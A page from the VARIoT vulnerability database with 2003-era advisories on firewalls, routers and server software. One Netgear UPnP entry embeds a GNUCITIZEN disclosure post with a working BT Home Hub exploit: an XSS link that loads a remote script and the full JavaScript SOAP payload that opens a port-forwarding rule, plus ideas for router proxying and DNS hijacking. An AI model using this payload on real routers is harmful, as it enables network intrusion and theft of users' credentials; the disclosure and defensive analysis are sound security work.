VARIoT IoT vulnerabilities database
VAR-200312-0440 | CVE-2003-1491 | Kerio Personal Firewall Firewall Filter Bypass Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Kerio Personal Firewall (KPF) 2.1.4 has a default rule to accept incoming packets from DNS (UDP port 53), which allows remote attackers to bypass the firewall filters via packets with a source port of 53. Reportedly, KPF suffers from a vulnerability whereby the existing firewall filters may be bypassed. This vulnerability exists due to the fact that UDP traffic to and from port 53 is allowed.
Allegedly, an attacker may craft a special packet with a source port of 53 and send this packet to a vulnerable system. KPF will allow this packet to proceed thus bypassing the firewall filters
VAR-200312-0439 | CVE-2003-1490 | SonicWALL Pro HTTP POST Remote denial of service vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service (device reset) via a long HTTP POST to the internal interface, possibly due to a buffer overflow. The firewall device will reset, resulting in a loss of availability while it goes through this cycle. This may be the result of a buffer being overrun, however, this has not been confirmed. SonicWALL PRO is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs
VAR-200304-0180 | No CVE | Cisco Catalyst CatOS Authentication Bypass Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
A vulnerability has been reported for Cisco Catalyst switches that may result in unauthorized access to the enable level.
The vulnerability exists due to the way the 'enable' mode is accessed through the switch.
An attacker who is able to obtain command line access to a vulnerable switch is able to access 'enable' mode without a password.
VAR-200304-0141 | No CVE | HP JetDirect Printer FTP Service File Print Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The HP JetDirect printer is a printer with integrated network capabilities developed by Hewlett-Packard. The FTP directory in the HP JetDirect printer is writable, and a remote attacker can exploit this vulnerability to perform a denial of service attack on the print service. Since the HP JetDirect printer's directory permissions for its FTP service are not set correctly, any files sent to the Jetdirect FTP service can be printed, and an attacker can send a large number of requests for a denial of service attack. It has been reported that HP JetDirect Printers accept documents from any source without access control limitations. This could lead to a denial of service or abuse of printing services
VAR-200305-0056 | CVE-2003-0210 | Cisco Secure ACS for Windows CSAdmin vulnerable to buffer overflow via login requests |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in the administration service (CSAdmin) for Cisco Secure ACS before 3.1.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long user parameter to port 2002. It has been reported that some versions of the Cisco Secure ACS software do not properly handle input supplied during authentication. Because of this, it may be possible for a remote attacker to gain unauthorized access to a host using the vulnerable software. The management service of Cisco Secure ACS listens on TCP port 2002 and provides web-based management. A buffer overflow occurs when CSAdmin processes the login request: if an overlong user parameter is sent to the service, the service hangs and must be restarted before it works again, and arbitrary code may be executed with system privileges. The BUG ID of this vulnerability is: CSCea51366
VAR-200404-0022 | CVE-2003-1033 | SAP database development tool INSTLSERVER INSTROOT environment variable vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The (1) instdbmsrv and (2) instlserver programs in SAP DB Development Tools 7.x trust the user-provided INSTROOT environment variable as a path when assigning setuid permissions to the lserver program, which allows local users to gain root privileges via a modified INSTROOT that points to a malicious dbmsrv or lserver program. SAP is an integrated enterprise resource planning system based on a client/server architecture and open systems; the database development tools are installed with it. The SAP database program instlserver has problems handling environment variables. Local attackers can exploit this vulnerability for privilege escalation and gain root privileges. The instlserver program uses user-supplied data while still running with root privileges when it chmods and chowns some files. When the 'DevTool/bin/instlserver' program runs, the file named by the environment variable 'INSTROOT' is chowned and chmoded. An attacker places a malicious file at the location named by the environment variable; the program then gives it the setuid root bit, thereby escalating privileges
VAR-200305-0066 | CVE-2003-0171 | Apple MacOS X DirectoryService Privilege Escalation Vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
DirectoryServices in MacOS X trusts the PATH environment variable to locate and execute the touch command, which allows local users to execute arbitrary commands by modifying the PATH to point to a directory containing a malicious touch program. Apple MacOS X DirectoryService is prone to an issue which may allow local attackers to gain elevated privileges. This issue is due to usage of the libc system() function to execute commands. Attackers may potentially set a PATH environment variable that causes an arbitrary file to be executed with elevated privileges. Exploitation may require the attacker to abuse other known issues (BID 7323) to crash the service. DirectoryServices is the MacOS X information and authentication subsystem, which is started during the startup phase and installed with the setuid root attribute by default. To exploit this vulnerability, the DirectoryServices service must first be stopped, which can be done by repeatedly connecting to port 625
VAR-200305-0065 | CVE-2003-0198 | Apple MacOS X DropBox Folder Remote Information Disclosure Vulnerability |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Mac OS X before 10.2.5 allows guest users to modify the permissions of the DropBox folder and read unauthorized files. A vulnerability has been discovered in Apple MacOS X 10.2.4 and earlier. The problem occurs when various file sharing services are enabled. The issue occurs in the privileges granted to 'guest' users, when accessing shared folders. Due to a design error, it may be possible for an unprivileged user to change the permissions of a write-only directory, effectively revealing its contents.
Information obtained through exploiting this vulnerability could aid an attacker in launching further attacks against a target system. Mac OS X is an operating system used on Mac machines, based on the BSD system. An issue in the way Mac OS X handles file-sharing services could allow remote attackers to gain access to sensitive file information. Using this information can help attackers further attack the system
VAR-200304-0137 | No CVE | Linksys BEFVP41 SNMP Default Community String Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Linksys BEFVP41 is a VPN-enabled router. The Linksys BEFVP41 has a default community string that remote attackers can use to obtain a large amount of sensitive information about the target network. The external interface of the Linksys VPN router uses the default, globally readable 'public' community string. Using this community string, an attacker can obtain sensitive information such as the hardware addresses of routers and hosts on the internal network. This information can be used to further attack the network. The Linksys BEFVP41 VPN router has been reported prone to a sensitive information disclosure vulnerability.
It should be noted that this issue has also been reported to affect the Linksys BEFSR81 appliance
VAR-200304-0140 | No CVE | Buffalo WBRG54 Wireless Broadband Router Remote Denial of Service Attack Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Buffalo WBRG54 is a wireless broadband router. The Buffalo WBRG54 does not cope with very large numbers of ICMP packets, which remote attackers can exploit to deny service on the device. In the vulnerability finder's test, two WBR-g54 broadband routers (the first named g54-01, the second g54-02) were connected in peer-to-peer mode: [attacker PC]--[g54-01]-.-.-peer-to-peer-.-.-[g54-02]--[victim PC]. Sending a large volume of ICMP packets to the device (on Linux, ping -f <victim IP> can be used) causes the connection to be broken. A vulnerability has been reported for the WBRG54 device that may result in a denial of service. The vulnerability occurs when a vulnerable device receives numerous ICMP packets. In some cases, this will result in the device behaving unpredictably and denying service
VAR-200304-0139 | No CVE | Netgear FM114P ProSafe Wireless Router Rules Can Be Vulnerable |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Netgear FM114P ProSafe is a wireless network router. The port blocking rules of the Netgear FM114P ProSafe wireless network router can be bypassed when the UPnP feature is in use, which remote attackers can exploit to reach restricted ports. The Netgear FM114P allows blocking of some ports, restricting external users from accessing the internal network or restricting internal users from connecting to the WAN. If remote access and UPnP are enabled on the device, remote users can submit UPnP SOAP requests that bypass the access restrictions imposed by these rules.
VAR-200304-0138 | No CVE | Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability in its UPnP feature, which remote attackers can exploit to obtain the WAN interface username and password. If remote access and UPnP are enabled on the device, a remote user can obtain the username and password for the Netgear FM114P ProSafe's WAN connection by submitting a UPnP SOAP request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5
It's known that UPnP [1] is inherently insecure for a very simple
reason: administrative tasks can be performed on an Internet Gateway
Device (IGD) without needing to know the admin password whatsoever!
This on its own is quite scary and I personally feel that although
there is some research in the public domain, there is much more
attention that needs to be paid to UPnP.
UPnP allows you to perform administrative functions. Some functions
are very standardized and supported by most devices. Examples include
obtaining network settings, and enabling port forwarding rules. Other
functions are make/model specific. Some very scary functions such as
obtaining administrative username and password pairs have been
reported [2] in the past. As a reminder, this works without submitting
any administrative password whatsoever since UPnP is an
authenticationless protocol. On top of this, most IGDs support UPnP by
default.
After having read several UPnP security research materials I realized
that all the described attacks assume that the attacker (be it human
or malware) comes from inside the network. This post describes how to
exploit IGDs remotely via UPnP even when no services are publicly
available (WAN interface).
** Preauth XSS + SOAP payload = remote UPnP exploitation **
If you sniff yourself while running software that uses UPnP in the
background to help you configure your router, you'll see that UPnP is
nothing more than SOAP. Our AJAX knowledge tells us about a feature
that allows us to craft arbitrary XML requests: the XMLHttpRequest [3]
object. Trouble is, such an object can only be used within the context of
the site that the requests are submitted to. So if we host the
malicious scripting code on a third-party site, and a victim user
located in the same LAN as the target IGD visits such page, the
request wouldn't go through due to XMLHttpRequest same-origin policy
restriction. Or put in a different way: you aren't allowed to make
XMLHttpRequests to any server except the server where your web page
came from.
However, if you find a pre-auth XSS vulnerability [4] on the target
device you can bypass such restriction. For instance, many devices
such as the BT Home Hub and Speedtouch routers offer certain pages
before authenticating. Some of these pages are cgi scripts which are
vulnerable to XSS. Although offering certain "useless" functionalities
before logging into the router might not seem like a big deal, it can
actually lead to UPnP being exploited remotely, even if the web admin
console is not visible from the Internet!
The following is a non-malicious proof-of-concept exploit which sets
up a port-forwarding rule from port 1337 on the WAN interface to port
445 on the internal IP address 192.168.1.64. Such IP address is the
first usable IP address reserved for clients connected to Speedtouch
and BT Home Hub routers. The exploit has been tested on BT Home Hub -
Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled
by default on the BT Home Hub, just like most IGDs. If your Internet
gateway is a BT Home Hub, clicking on the following link should add a
new forward rule called EVILFORWARDRULE: ATTACK
<http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=>
In order to check if the port-forwarding rule was added successfully
you can use UPnP Port Forwarding Utility [5] and simply click on
"Update list now" after the device has been discovered (device name
should show on the top-left corner a few seconds later after launching
the tool). You could of course use the technique and code explained in
this post on any Internet gateway that supports UPnP and is
vulnerable to a preauth XSS vulnerability. If you manage to
successfully test this attack on the BT Home Hub or any other device
please let us know!
** Zombie routers and the unvalidated NewInternalClient bug **
A bit more UPnP hacking led me to realize that the BT Home Hub is
vulnerable to the (in)famous unvalidated NewInternalClient bug. This
bug allows you to choose an external IP address instead of a LAN IP
address as intended when setting up port-forwarding rules via UPnP.
In this case, I reused the previous code and changed the internal IP
address (192.168.1.64) in the NewInternalClient tag with the IP
address of a random Internet web server and the value of the
NewInternalPort tag to 80. This effectively allows an attacker to use
the vulnerable BT Home Hub router as a proxy - aka onion router. In
other words, when probing the router's NATed IP address on port 1337,
the attacker is effectively probing the IP address and port number
specified by the port-forwarding rule - except the router's IP address
would be shown in logs of the target web server, as opposed to the
attacker's real IP address. I thought this is a nice real example of
how a vulnerable router can be used as a zombie by simply having a
user visit a page with malicious scripting (XSS + UPnP SOAP request).
Imagine running your favourite vulnerability scanner against a target
site, while using the victim user's router as a proxy - sweet!
There are other UPnP functionalities besides port forwarding rules
that look potentially interesting from a hacking point of view. For
instance, SetDNSServer [6] allows you to guess what, set the gateway's
DNS server. Imagine someone changing your router's DNS server setting
by simply visiting a webpage. After that you visit
yourfavoritebank.com and guess what, you're actually visiting a
malicious server that is harvesting all your banking login details!
I'll leave the exercise of writing a remote UPnP exploit that changes
the DNS server setting on the BT Home Hub (or any other vulnerable
router) to the reader.
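The unvalidated NewInternalClient bug above is the absence of one server-side check. As an added example (not GNUCITIZEN's code and not taken from any router firmware), this is the validation an IGD should apply to an AddPortMapping request before installing a NAT rule: parse the SOAP body, require a TCP/UDP protocol and sane ports, and refuse any NewInternalClient outside the LAN prefix. Assumptions: a LAN prefix of 192.168.1.0/24 (the Home Hub's default range named in the post) and constructed request bodies shaped like the payload.xss envelope; 203.0.113.10 is a documentation address standing in for "a random Internet web server".

```javascript
// Argument elements of the WANPPPConnection/WANIPConnection AddPortMapping action.
const ELEMENTS = ['NewRemoteHost', 'NewExternalPort', 'NewProtocol',
  'NewInternalPort', 'NewInternalClient', 'NewEnabled',
  'NewPortMappingDescription', 'NewLeaseDuration'];

// Small regex-based extractor: returns the text of each argument element,
// or null if the body is not an AddPortMapping call at all.
function parseAddPortMapping(xml) {
  if (!/<(\w+:)?AddPortMapping\b/.test(xml)) return null;
  const args = {};
  for (const name of ELEMENTS) {
    const m = xml.match(new RegExp('<' + name + '\\b[^>]*>([^<]*)</' + name + '>'));
    args[name] = m ? m[1].trim() : '';
  }
  return args;
}

// Dotted-quad IPv4 to an unsigned 32-bit number; null on malformed input.
function ipv4ToInt(ip) {
  const parts = ip.split('.');
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) return null;
    n = n * 256 + Number(p);
  }
  return n;
}

// True when ip lies inside cidr (e.g. '192.168.1.0/24').
function inSubnet(ip, cidr) {
  const [net, bitsStr] = cidr.split('/');
  const bits = Number(bitsStr);
  const a = ipv4ToInt(ip), b = ipv4ToInt(net);
  if (a === null || b === null) return false;
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((a & mask) >>> 0) === ((b & mask) >>> 0);
}

// Returns { ok: true, args } or { ok: false, reason } for a request body.
function validateAddPortMapping(xml, lanCidr) {
  const args = parseAddPortMapping(xml);
  if (!args) return { ok: false, reason: 'not an AddPortMapping request' };
  if (!['TCP', 'UDP'].includes(args.NewProtocol))
    return { ok: false, reason: 'NewProtocol must be TCP or UDP' };
  for (const p of ['NewExternalPort', 'NewInternalPort']) {
    const v = Number(args[p]);
    if (!/^\d+$/.test(args[p]) || v < 1 || v > 65535)
      return { ok: false, reason: p + ' out of range' };
  }
  // The check the vulnerable firmware skipped: the target of a port-forward
  // must be a host on the LAN, never an arbitrary Internet address.
  if (!inSubnet(args.NewInternalClient, lanCidr))
    return { ok: false, reason: 'NewInternalClient not on LAN' };
  if (!/^\d+$/.test(args.NewLeaseDuration))
    return { ok: false, reason: 'NewLeaseDuration not numeric' };
  return { ok: true, args };
}

// Constructed request body (assumption) mirroring the shape of payload.xss.
function soapBody(internalClient, internalPort) {
  return '<?xml version="1.0"?><SOAP-ENV:Envelope ' +
    'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body>' +
    '<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">' +
    '<NewRemoteHost></NewRemoteHost><NewExternalPort>1337</NewExternalPort>' +
    '<NewProtocol>TCP</NewProtocol>' +
    '<NewInternalPort>' + internalPort + '</NewInternalPort>' +
    '<NewInternalClient>' + internalClient + '</NewInternalClient>' +
    '<NewEnabled>1</NewEnabled>' +
    '<NewPortMappingDescription>EVILFORWARDRULE</NewPortMappingDescription>' +
    '<NewLeaseDuration>0</NewLeaseDuration></m:AddPortMapping>' +
    '</SOAP-ENV:Body></SOAP-ENV:Envelope>';
}

const LAN = '192.168.1.0/24'; // assumed LAN prefix
// A LAN target is accepted; an Internet host as NewInternalClient (the
// "zombie router" case) is refused.
const lanResult = validateAddPortMapping(soapBody('192.168.1.64', 445), LAN);
const wanResult = validateAddPortMapping(soapBody('203.0.113.10', 80), LAN);
console.log(lanResult.ok, wanResult.ok, wanResult.reason);
```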
** About GNUCITIZEN **
GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think
Tank, which primarily deals with all aspects of the art of hacking.
Our work has been featured in established magazines and information
portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and
many others. The members of the GNUCITIZEN group are well known and
well established experts in the Information Security, Black Public
Relations (PR) Industries and Hacker Circles with widely recognized
experience in the government and corporate sectors and the open source
community.
GNUCITIZEN is an ethical, white-hat organization that doesn't hide
anything. We strongly believe that knowledge belongs to everyone and
we do everything we can to ensure that our readers have access to the
latest cutting-edge research and get alerted of the newest security
threats when they come. Our experience shows that the best way of
protection is the mass information. And we mean that literally!!! It
is in the public's best interest to make our findings accessible to
vast majority of people, simply because it is proven that the more
people know about a certain problem, the better.
[1] http://www.upnp.org/resources/whitepapers.asp
[2] http://www.securityfocus.com/bid/7267/discuss
[3] http://www.w3.org/TR/XMLHttpRequest/
[4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4
[5] http://www.codeproject.com/KB/IP/PortForward.aspx
[6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)
// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss
var req;
var url = "/upnp/control/igd/wanpppcInternet";

function loadXMLDoc(url) {
    req = false;
    // branch for native XMLHttpRequest object
    if (window.XMLHttpRequest && !(window.ActiveXObject)) {
        try {
            req = new XMLHttpRequest();
        } catch (e) {
            req = false;
        }
    // branch for IE/Windows ActiveX version
    } else if (window.ActiveXObject) {
        try {
            req = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                req = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {
                req = false;
            }
        }
    }
    if (req) {
        req.onreadystatechange = processReqChange;
        req.open("POST", url, true);
        req.setRequestHeader('SOAPAction',
            '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"');
        // SOAP body: a single AddPortMapping call, concatenated across lines
        req.send('<?xml version="1.0"?>' +
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" ' +
            'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' +
            '<SOAP-ENV:Body>' +
            '<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">' +
            '<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost>' +
            '<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">1337</NewExternalPort>' +
            '<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol>' +
            '<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">445</NewInternalPort>' +
            '<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">192.168.1.64</NewInternalClient>' +
            '<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled>' +
            '<NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">EVILFORWARDRULE</NewPortMappingDescription>' +
            '<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration>' +
            '</m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>');
    }
}

function processReqChange() {
    // only if req shows "loaded"
    if (req.readyState == 4) {
        // only if "OK"
        if (req.status == 200) {
            // ...processing statements go here...
            //alert(req.responseText);
        } else {
            alert("There was a problem retrieving the XML data:\n" +
                req.statusText);
        }
    }
}

loadXMLDoc(url);
--
pagvac
gnucitizen.org, ikwt.com
VAR-200312-0325 | CVE-2003-1547 | PHP-Nuke Block-Forums.PHP Subject HTML Injection Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in block-Forums.php in the Splatt Forum module for PHP-Nuke 6.x allows remote attackers to inject arbitrary web script or HTML via the subject parameter. The PHP-Nuke 'block-Forums.php' does not sufficiently sanitize data supplied via form fields, making it prone to HTML injection attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code
VAR-200303-0032 | CVE-2002-1540 | Applications that use the Windows Help function may be vulnerable to privilege escalation |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The client for Symantec Norton AntiVirus Corporate Edition 7.5.x before 7.5.1 Build 62 and 7.6.x before 7.6.1 Build 35a runs winhlp32 with raised privileges, which allows local users to gain privileges by using certain features of winhlp32. Applications or services that call the Windows Help function in an insecure manner may allow a user unauthorized access to resources on the system. This issue may occur in applications or services where the Help function is not called in a secure manner. An example of this is when anti-virus software or a personal firewall runs on the local system with the privileges of a local administrator and has an interface to "communicate" with the user. ISIHARA Takanori reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. A user may gain unauthorized access to resources on the system
VAR-200304-0024 | CVE-2003-0168 | Apple QuickTime Player for Windows contains buffer overflow in processing of overly long QuickTime URLs |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in Apple QuickTime Player 5.x and 6.0 for Windows allows remote attackers to execute arbitrary code via a long QuickTime URL. Apple's QuickTime Player is a player for files and streaming media in the QuickTime format. Versions of the player are available for both the Microsoft Windows and Apple MacOS platforms. It has been reported that the QuickTime Player does not properly handle some types of URLs. Apple QuickTime Player is multimedia playback software developed by Apple. The software is capable of handling multiple sources such as digital video, media segments, and more. When the player processes a QuickTime URL, the application reads the handler command from the HKEY_CLASSES_ROOT\quicktime Windows registry key: "%PATH TO QUICKTIME%\QuickTimePlayer.exe" -u "%1". A URL of 400 characters overruns the buffer allocated on the stack and overwrites the saved instruction pointer
VAR-200304-0013 | CVE-2003-0161 | Sendmail address parsing buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337. Sendmail contains a buffer overflow in code that parses email addresses. A remote attacker could execute arbitrary code or cause a denial of service on a vulnerable system. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This vulnerability stems from a logic error in the conversion of a char to an integer value. The issue has been fixed in Sendmail 8.12.9. Most organizations have various mail transfer agents (MTAs) at various locations within their network, at least one of which is directly connected to the Internet. Sendmail is one of the most popular MTAs. According to statistics, Internet mail traffic handled by Sendmail accounts for 50% to 75% of the total. Many UNIX and Linux workstations run Sendmail by default. This vulnerability exists in the prescan() process. The vulnerability is message-oriented, not connection-oriented. This means that the vulnerability is triggered by the content of a specially crafted email message, rather than by lower-level network communications. This is important because a non-vulnerable MTA will pass a malicious message along to other MTAs in the network. In other words, even if the site's boundary MTA is not sendmail, vulnerable sendmail servers inside the network are still threatened. Messages that exploit this vulnerability can also pass through many common packet filters or firewalls undetected
VAR-200303-0129 | No CVE | D-Link DSL Broadband Modem / Router SNMP Common String Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
D-Link DSL-500 is a DSL broadband router.
The D-Link DSL-500 has a default public SNMP community string. Remote attackers can use this SNMP community string to obtain sensitive information contained in the device, such as user names and passwords.
The D-Link DSL-500 installed by default enables the SNMP service program, which contains the default community strings public and private, which can read and modify the device.
In addition, ISP account information such as login names and passwords are stored in the device in clear text. Attackers can use this vulnerability to obtain password information.
VAR-200303-0125 | No CVE | D-Link DI-614+ IP Fragment Reassembly Remote Denial of Service Attack Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The D-Link DI-614+ is a wireless router made by D-Link. The D-Link DI-614+ wireless router does not handle specially crafted fragmented IP packets correctly. A remote attacker can exploit this vulnerability to reset the router and cause a denial of service. An attacker sends a fragmented packet with a malicious size parameter to the affected device, causing the device to reboot and fail to handle normal communication. It has been reported that the implementation of the Internet Protocol (IP) in the firmware of the D-Link DI-614+ wireless router is vulnerable to a remotely exploitable denial of service condition. There is existing source code that exploits similar, older vulnerabilities that can be used to successfully exploit this vulnerability. When exploited, the device will reboot instantly. This will result in a denial of service until the device has restarted
VAR-200312-0107 | CVE-2003-1132 | Incorrect NXDOMAIN responses from AAAA queries could cause denial-of-service conditions |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The DNS server for Cisco Content Service Switch (CSS) 11000 and 11500, when prompted for a nonexistent AAAA record, responds with response code 3 (NXDOMAIN or "Name Error") instead of response code 0 ("No Error"), which allows remote attackers to cause a denial of service (inaccessible domain) by forcing other DNS servers to send and cache a request for an AAAA record to the vulnerable server. CSS11500 Content Services Switch is prone to a denial-of-service vulnerability
VAR-200304-0054 | CVE-2003-0106 | Symantec Enterprise Firewall of URL Vulnerabilities that bypass the filtering function |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The HTTP proxy for Symantec Enterprise Firewall (SEF) 7.0 allows proxy users to bypass pattern matching for blocked URLs via requests that are URL-encoded with escapes, Unicode, or UTF-8. When a URL containing a pattern that matches a pattern blocking rule is submitted by a user behind the firewall, that HTTP request will be blocked. The URL rule filtering of the Symantec Enterprise Firewall lacks proper handling of some encodings, and remote attackers can use this vulnerability to bypass security policies and access restricted resources. The HTTP pattern matching function works by parsing the HTTP URL and comparing it against the predefined pattern database. When a pattern matches, the request is blocked and a '403 Forbidden' error is returned. However, if the requested URL uses a special encoding (such as escape sequences, Unicode, UTF-8, etc.), pattern matching fails to parse it, and the attacker bypasses the security rules and accesses the restricted resource